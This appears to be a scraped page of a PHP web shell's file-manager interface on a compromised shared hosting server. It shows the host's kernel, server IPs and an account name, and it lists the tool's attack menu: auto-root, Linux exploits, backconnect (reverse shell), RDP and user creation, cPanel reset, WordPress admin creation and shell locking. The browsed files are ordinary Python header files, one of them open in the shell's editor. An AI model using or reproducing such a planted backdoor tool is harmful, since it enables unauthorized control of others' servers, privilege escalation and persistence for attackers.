Linux host45.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Apache
: 198.54.116.152 | : 216.73.216.59
Cant Read [ /etc/named.conf ]
8.1.32
bankpromax
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
alt /
python37 /
include /
python3.7m /
internal /
[ HOME SHELL ]
Name
Size
Permission
Action
ceval.h
1.4
KB
-rw-r--r--
condvar.h
2.66
KB
-rw-r--r--
context.h
701
B
-rw-r--r--
gil.h
1.4
KB
-rw-r--r--
hamt.h
3.53
KB
-rw-r--r--
hash.h
123
B
-rw-r--r--
import.h
114
B
-rw-r--r--
mem.h
6.67
KB
-rw-r--r--
pycore_long.h
1.51
KB
-rw-r--r--
pygetopt.h
458
B
-rw-r--r--
pystate.h
4.21
KB
-rw-r--r--
warnings.h
508
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : pygetopt.h
#ifndef Py_INTERNAL_PYGETOPT_H #define Py_INTERNAL_PYGETOPT_H extern int _PyOS_opterr; extern int _PyOS_optind; extern wchar_t *_PyOS_optarg; extern void _PyOS_ResetGetOpt(void); typedef struct { const wchar_t *name; int has_arg; int val; } _PyOS_LongOption; extern int _PyOS_GetOpt(int argc, wchar_t **argv, wchar_t *optstring, const _PyOS_LongOption *longopts, int *longindex); #endif /* !Py_INTERNAL_PYGETOPT_H */
Close